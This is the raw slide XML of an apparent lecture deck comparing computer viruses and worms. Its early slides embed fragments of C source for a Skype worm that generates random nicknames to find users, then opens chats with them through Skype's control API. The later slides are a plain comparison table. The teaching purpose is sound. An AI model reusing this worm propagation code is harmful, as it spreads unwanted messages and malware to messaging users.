              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>				if(strstr(SkypeData-&gt;lpData,"USERS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found_users = (char *)GlobalAlloc(GMEM_ZEROINIT|GMEM_FIXED,3096);</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if(found_users == NULL)</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chat_cmd = (char *)GlobalAlloc(GMEM_ZEROINIT|GMEM_FIXED,3096+128);</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if(chat_cmd == NULL)</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strcpy(found_users,(char *)SkypeData-&gt;lpData);</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strcpy(found_users,found_users+6);</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sprintf(chat_cmd,"CHAT CREATE %s",found_users);</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 contact them :)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cds.dwData= 0;</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cds.lpData= chat_cmd;</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cds.cbData= strlen(chat_cmd)+1;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SendMessage(SkypeWnd, WM_COPYDATA, Answer , (LPARAM)&amp;cds);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>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GlobalFree(found_users);</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GlobalFree(chat_cmd);</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Worms-Behaviors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6" name="Text Box 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2331403" y="1798320"/>
            <a:ext cx="7529195" cy="3636010"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B0F0">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="00B0F0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>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DefWindowProc( hWnd, uMsg , wParam, lParam);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
            </a:pP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return 1; /* != 0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Worms-Generate random nicknames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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2459673" y="1489075"/>
            <a:ext cx="7272655" cy="4492625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B0F0">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="00B0F0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t> /* generate random nicks to search */</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void GetRandNick(void)</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char possible_searches[] = "qwertyuiopasdfghjklzxcvbnm";</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pP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srand(GetTickCount());</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rnd_nick[0] = possible_searches[rand()%26];</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rnd_nick[1] = 0;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="130000"/>
              </a:lnSpc>
            </a:pP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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="277813" y="1043305"/>
            <a:ext cx="11636375" cy="5406390"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00B0F0">
              <a:alpha val="5000"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>int __stdcall WinMain (HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)</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MSG oMessage;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SkypeAttach = RegisterWindowMessage("SkypeControlAPIAttach");</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SkypeDiscover = RegisterWindowMessage("SkypeControlAPIDiscover");</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RunSkype(); /* (try to) run skype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if(SkypeAttach != 0 &amp;&amp; SkypeDiscover != 0)</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MakeWindow(); /* Create window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SendMessage(HWND_BROADCAST,  //A handle to the window whose window procedure will receive the message.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SkypeDiscover,   //The message to be sent.</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Answer,  //A handle to the window passing the data.</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0);   //A pointer to a COPYDATASTRUCT structure that contains the data to be passed.</a:t>
            </a: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while(GetMessage( &amp;oMessage, 0, 0, 0)!=FALSE) //return all available messages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TranslateMessage(&amp;oMessage);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DispatchMessage(&amp;oMessage);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4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4610735" y="2492058"/>
            <a:ext cx="6845300" cy="1873885"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="ctr" anchorCtr="0">
            <a:no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rPr>
              <a:t>Comparison</a:t>
            </a:r>
            <a:endPar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03</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US"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Part Three</a:t>
            </a:r>
            <a:endPar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noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="07A7AF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Viruses</a:t>
            </a:r>
            <a:r>
              <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rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="3600" b="1" i="1" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>VS</a:t>
            </a:r>
            <a:r>
              <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rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="3600" b="1" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Worms</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="3600" b="1" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="3" name="表格 2"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="805815" y="2124075"/>
          <a:ext cx="10762615" cy="4156085"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1"/>
              <a:tblGrid>
                <a:gridCol w="6104255"/>
                <a:gridCol w="4658360"/>
              </a:tblGrid>
              <a:tr h="936000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                        </a:rPr>
                        <a:t>Host Dependency</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-CN"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7BECC"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2800" b="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                        </a:rPr>
                        <a:t>Host Dependency</a:t>
                      </a:r>
                      <a:endParaRPr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4C3C"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="1152525">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2200">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                        </a:rPr>
                        <a:t>Viruses attach themselves to a host file or program. They need a host program to carry out their malicious actions. When the host program is executed, the virus is activated.</a:t>
                      </a:r>
                      <a:endParaRPr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F2F5"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2200">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                        </a:rPr>
                        <a:t>Worms are standalone programs that do not require a host file to propagate. They operate independently and can execute their code without relying on another program.</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200">
                        <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                        <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:endParaRPr lang="zh-CN" altLang="en-US"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DBD8"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7" descr="冠状病毒"/>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364490" y="1593850"/>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Worms</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solidFill>
                  <a:srgbClr val="07A7AF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Viruses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" i="1" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>VS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Worms</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="3600" b="1" i="1" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="30000" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="3" name="表格 2"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="805815" y="2048510"/>
          <a:ext cx="10762615" cy="4156085"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1"/>
              <a:tblGrid>
                <a:gridCol w="6104255"/>
                <a:gridCol w="4658360"/>
              </a:tblGrid>
              <a:tr h="936000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                        </a:rPr>
                        <a:t>Propagation</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-CN"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7BECC"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2800" b="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                        </a:rPr>
                        <a:t>Propagation</a:t>
                      </a:r>
                      <a:endParaRPr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4C3C"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="1152525">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2200">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                        </a:rPr>
                        <a:t>Viruses rely on human action to propagate. They typically spread when an infected file or program is shared or transferred by users. For example, viruses often spread via infected email attachments, shared files, or infected downloads.</a:t>
                      </a:r>
                      <a:endParaRPr sz="2200">
                        <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                        <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:endParaRPr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F2F5"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2200">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                        </a:rPr>
                        <a:t>Worms are self-replicating and can spread autonomously across networks or devices. They exploit vulnerabilities or security weaknesses to infect other computers or devices.</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200">
                        <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                        <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:endParaRPr lang="zh-CN" altLang="en-US"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DBD8"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7" descr="冠状病毒"/>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364490" y="1518285"/>
            <a:ext cx="914400" cy="914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solidFill>
                  <a:srgbClr val="07A7AF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Viruses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" i="1" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>VS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Worms</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="3600" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="A728BE"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2" name="表格 1"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="805815" y="2048510"/>
          <a:ext cx="10762615" cy="4156085"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1"/>
              <a:tblGrid>
                <a:gridCol w="6104255"/>
                <a:gridCol w="4658360"/>
              </a:tblGrid>
              <a:tr h="936000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="2800" b="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                        </a:rPr>
                        <a:t>Payload</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-CN"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7BECC"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2800" b="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                        </a:rPr>
                        <a:t>Payload</a:t>
                      </a:r>
                      <a:endParaRPr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4C3C"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="1152525">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2200">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                        </a:rPr>
                        <a:t>Viruses may or may not have a payload. If they have a payload, it is the malicious action they perform, such as deleting files or displaying a message.</a:t>
                      </a:r>
                      <a:endParaRPr sz="2200">
                        <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                        <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:endParaRPr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F2F5"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2200">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                        </a:rPr>
                        <a:t>Worms may have a payload, which could be a malicious action like deleting files or installing a backdoor for remote control. However, their primary purpose is to spread rapidly.</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200">
                        <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                        <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="l">
                        <a:buNone/>
                      </a:pPr>
                      <a:endParaRPr lang="zh-CN" altLang="en-US"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DBD8"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4" descr="冠状病毒"/>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364490" y="1518285"/>
            <a:ext cx="914400" cy="914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solidFill>
                  <a:srgbClr val="07A7AF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Viruses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" i="1" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>VS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Worms</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="3600" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="A728BE"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2" name="表格 1"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="805815" y="2188845"/>
          <a:ext cx="10762615" cy="4156085"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1"/>
              <a:tblGrid>
                <a:gridCol w="6104255"/>
                <a:gridCol w="4658360"/>
              </a:tblGrid>
              <a:tr h="936000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:buNone/>
